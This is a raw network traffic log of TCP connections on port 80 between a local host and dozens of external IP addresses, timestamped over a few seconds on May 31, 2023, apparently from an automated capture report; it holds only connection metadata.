                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.931623936 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.931651115 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.931672096 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.931704044 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.931750059 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932076931 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932105064 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932123899 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932135105 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932151079 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932177067 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932185888 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932224035 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932272911 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932321072 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932414055 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932461977 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932578087 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932610035 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932624102 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932652950 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932673931 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932713985 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932771921 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932817936 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.932949066 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933000088 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933037043 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933078051 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933094978 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933130980 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933213949 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933254957 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933309078 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933350086 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933429003 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933473110 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933541059 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933583975 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933706999 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933754921 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933778048 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933819056 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933895111 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.933942080 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934015036 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934058905 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934077024 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934115887 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934221983 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934267044 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934289932 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934329987 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934429884 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934473991 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934514999 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934555054 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934648991 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934689045 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934768915 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934786081 CEST804995262.75.216.137192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934815884 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.934848070 CEST4995280192.168.2.362.75.216.137
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.116384983 CEST4995380192.168.2.3157.112.176.4
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.123017073 CEST4995480192.168.2.35.196.166.214
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.163693905 CEST80499545.196.166.214192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.163891077 CEST4995480192.168.2.35.196.166.214
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.164424896 CEST4995480192.168.2.35.196.166.214
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.180036068 CEST804993693.187.206.66192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.180226088 CEST4993680192.168.2.393.187.206.66
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.206309080 CEST80499545.196.166.214192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.206363916 CEST80499545.196.166.214192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.206466913 CEST4995480192.168.2.35.196.166.214
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.323483944 CEST4995580192.168.2.3188.114.97.7
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.340446949 CEST8049955188.114.97.7192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.340645075 CEST4995580192.168.2.3188.114.97.7
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.343385935 CEST4995580192.168.2.3188.114.97.7
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.360287905 CEST8049955188.114.97.7192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.371792078 CEST8049955188.114.97.7192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.371892929 CEST4995580192.168.2.3188.114.97.7
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.383946896 CEST4995580192.168.2.3188.114.97.7
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.406397104 CEST8049955188.114.97.7192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.406610966 CEST4995580192.168.2.3188.114.97.7
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.407707930 CEST8049953157.112.176.4192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.407834053 CEST4995380192.168.2.3157.112.176.4
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.444607973 CEST8049943122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.444700956 CEST4994380192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.472251892 CEST4995380192.168.2.3157.112.176.4
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.558445930 CEST8049918213.186.33.40192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.558536053 CEST4991880192.168.2.3213.186.33.40
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.637723923 CEST4995680192.168.2.3103.224.212.221
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.763705969 CEST8049953157.112.176.4192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.804891109 CEST8049956103.224.212.221192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.805058002 CEST4995680192.168.2.3103.224.212.221
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.805486917 CEST4995680192.168.2.3103.224.212.221
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.846179962 CEST8049953157.112.176.4192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.846373081 CEST4995380192.168.2.3157.112.176.4
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.946830988 CEST4995780192.168.2.3173.254.28.29
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.013046026 CEST8049956103.224.212.221192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.079407930 CEST8049956103.224.212.221192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.079447031 CEST8049956103.224.212.221192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.079544067 CEST4995680192.168.2.3103.224.212.221
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.079612017 CEST4995680192.168.2.3103.224.212.221
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.080009937 CEST4995680192.168.2.3103.224.212.221
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.125549078 CEST8049957173.254.28.29192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.127331018 CEST4995780192.168.2.3173.254.28.29
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.129379988 CEST4995780192.168.2.3173.254.28.29
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.239245892 CEST4994180192.168.2.364.125.133.18
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.247134924 CEST8049956103.224.212.221192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.307981968 CEST8049957173.254.28.29192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.313054085 CEST8049957173.254.28.29192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.314477921 CEST4995780192.168.2.3173.254.28.29
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.341423988 CEST4995780192.168.2.3173.254.28.29
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.523036003 CEST8049957173.254.28.29192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.523473024 CEST4995780192.168.2.3173.254.28.29
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.001127005 CEST4995880192.168.2.3157.112.182.239
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.225506067 CEST4995980192.168.2.399.84.88.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.240111113 CEST804995999.84.88.20192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.241504908 CEST4995980192.168.2.399.84.88.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.241915941 CEST4995980192.168.2.399.84.88.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.256455898 CEST804995999.84.88.20192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.256622076 CEST804995999.84.88.20192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.256696939 CEST4995980192.168.2.399.84.88.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.272064924 CEST8049958157.112.182.239192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.272494078 CEST4995880192.168.2.3157.112.182.239
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.272836924 CEST4995880192.168.2.3157.112.182.239
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.278672934 CEST4995980192.168.2.399.84.88.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.293239117 CEST804995999.84.88.20192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.293320894 CEST804995999.84.88.20192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.293469906 CEST4995980192.168.2.399.84.88.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.431914091 CEST4996080192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.432389021 CEST4996180192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.464129925 CEST8049960213.186.33.17192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.464401960 CEST4996080192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.464914083 CEST4996080192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.500591993 CEST8049960213.186.33.17192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.500623941 CEST8049960213.186.33.17192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.500637054 CEST8049960213.186.33.17192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.500863075 CEST4996080192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.543776989 CEST8049958157.112.182.239192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.544879913 CEST8049958157.112.182.239192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.544924974 CEST8049958157.112.182.239192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.544965982 CEST8049958157.112.182.239192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.545114040 CEST4995880192.168.2.3157.112.182.239
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.545151949 CEST4995880192.168.2.3157.112.182.239
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.610549927 CEST8049951104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.610621929 CEST4995180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.635807037 CEST4996280192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.711091042 CEST8049961211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.715584993 CEST4996180192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.715917110 CEST4996180192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.732435942 CEST8049962192.241.158.94192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.734639883 CEST4996280192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.736572981 CEST4996280192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.833019018 CEST8049962192.241.158.94192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.833051920 CEST8049962192.241.158.94192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.833197117 CEST4996280192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.859282970 CEST4996280192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.955550909 CEST8049962192.241.158.94192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.955671072 CEST4996280192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.994865894 CEST8049961211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.994893074 CEST8049961211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.994973898 CEST4996180192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.106600046 CEST4996180192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.262331963 CEST4996380192.168.2.3104.21.55.224
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.279184103 CEST8049963104.21.55.224192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.279280901 CEST4996380192.168.2.3104.21.55.224
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.284068108 CEST4996380192.168.2.3104.21.55.224
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.300971985 CEST8049963104.21.55.224192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.312201977 CEST8049963104.21.55.224192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.312319994 CEST4996380192.168.2.3104.21.55.224
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.385973930 CEST8049961211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.386096001 CEST4996180192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.415621996 CEST4996480192.168.2.369.163.239.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.553189993 CEST4996580192.168.2.3172.67.70.223
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.569885969 CEST8049965172.67.70.223192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.570053101 CEST4996580192.168.2.3172.67.70.223
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.570513010 CEST4996580192.168.2.3172.67.70.223
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.580205917 CEST804996469.163.239.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.580360889 CEST4996480192.168.2.369.163.239.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.580826998 CEST4996480192.168.2.369.163.239.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.586922884 CEST8049965172.67.70.223192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.628103018 CEST4970280192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.637614012 CEST4996680192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.643790960 CEST4969980192.168.2.3104.21.23.9
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.647413969 CEST8049702192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.647537947 CEST4970280192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.655509949 CEST804993574.208.236.101192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.655591965 CEST4993580192.168.2.374.208.236.101
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.656872988 CEST8049966192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.657011986 CEST4996680192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.660500050 CEST8049699104.21.23.9192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.660593033 CEST4969980192.168.2.3104.21.23.9
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.662578106 CEST4996780192.168.2.3104.21.23.9
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.679150105 CEST8049967104.21.23.9192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.679301023 CEST4996780192.168.2.3104.21.23.9
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.745223045 CEST804996469.163.239.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.745568991 CEST804996469.163.239.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.745959044 CEST4996480192.168.2.369.163.239.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.771044016 CEST4996480192.168.2.369.163.239.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.860301018 CEST4996680192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.876019955 CEST4996780192.168.2.3104.21.23.9
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.879534960 CEST8049966192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.882761955 CEST8049966192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.883169889 CEST4996680192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.892560959 CEST8049967104.21.23.9192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.909012079 CEST4970580192.168.2.359.106.19.204
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.921549082 CEST8049967104.21.23.9192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.921663046 CEST4996780192.168.2.3104.21.23.9
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.935754061 CEST804996469.163.239.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.935874939 CEST804996469.163.239.62192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.935959101 CEST4996480192.168.2.369.163.239.62
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.971173048 CEST4970180192.168.2.370.39.251.249
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.971235991 CEST4996680192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.990649939 CEST8049966192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.992156029 CEST4996680192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.016417027 CEST4970380192.168.2.380.93.82.33
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.016710997 CEST4996880192.168.2.359.106.19.204
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.017258883 CEST4996980192.168.2.33.94.41.167
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.046500921 CEST804970380.93.82.33192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.070615053 CEST4970680192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.070620060 CEST4997080192.168.2.370.39.251.249
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.076715946 CEST804970170.39.251.249192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.085238934 CEST4997180192.168.2.380.93.82.33
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.089577913 CEST4997280192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.115309954 CEST804997180.93.82.33192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.115458965 CEST4997180192.168.2.380.93.82.33
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.133052111 CEST4997180192.168.2.380.93.82.33
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.163459063 CEST80499693.94.41.167192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.163507938 CEST804997180.93.82.33192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.163691044 CEST4996980192.168.2.33.94.41.167
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.163753986 CEST4997180192.168.2.380.93.82.33
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.176049948 CEST804997070.39.251.249192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.176188946 CEST4997080192.168.2.370.39.251.249
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.178323984 CEST804970559.106.19.204192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.242182016 CEST4996980192.168.2.33.94.41.167
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.242233992 CEST4997080192.168.2.370.39.251.249
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.242660999 CEST4970980192.168.2.334.117.168.233
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.244138002 CEST4997380192.168.2.334.117.168.233
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.246378899 CEST4997480192.168.2.372.44.93.236
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.252331018 CEST4971080192.168.2.3172.67.73.176
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.253053904 CEST4997180192.168.2.380.93.82.33
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.254789114 CEST4997580192.168.2.3172.67.73.176
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.259140968 CEST804997334.117.168.233192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.259363890 CEST4997380192.168.2.334.117.168.233
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.259767056 CEST4997380192.168.2.334.117.168.233
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.266072989 CEST804970934.117.168.233192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.266227961 CEST4970980192.168.2.334.117.168.233
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.269572020 CEST8049710172.67.73.176192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.269660950 CEST4971080192.168.2.3172.67.73.176
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.271303892 CEST8049975172.67.73.176192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.271410942 CEST4997580192.168.2.3172.67.73.176
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.272017956 CEST4997580192.168.2.3172.67.73.176
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.274565935 CEST804997334.117.168.233192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.283426046 CEST804997180.93.82.33192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.283651114 CEST4997180192.168.2.380.93.82.33
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.288561106 CEST8049975172.67.73.176192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.289786100 CEST804996859.106.19.204192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.290915966 CEST4996880192.168.2.359.106.19.204
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.294315100 CEST804997334.117.168.233192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.294971943 CEST4997380192.168.2.334.117.168.233
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.304910898 CEST8049975172.67.73.176192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.305073977 CEST4997580192.168.2.3172.67.73.176
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.347194910 CEST804997070.39.251.249192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.348114967 CEST804997070.39.251.249192.168.2.3
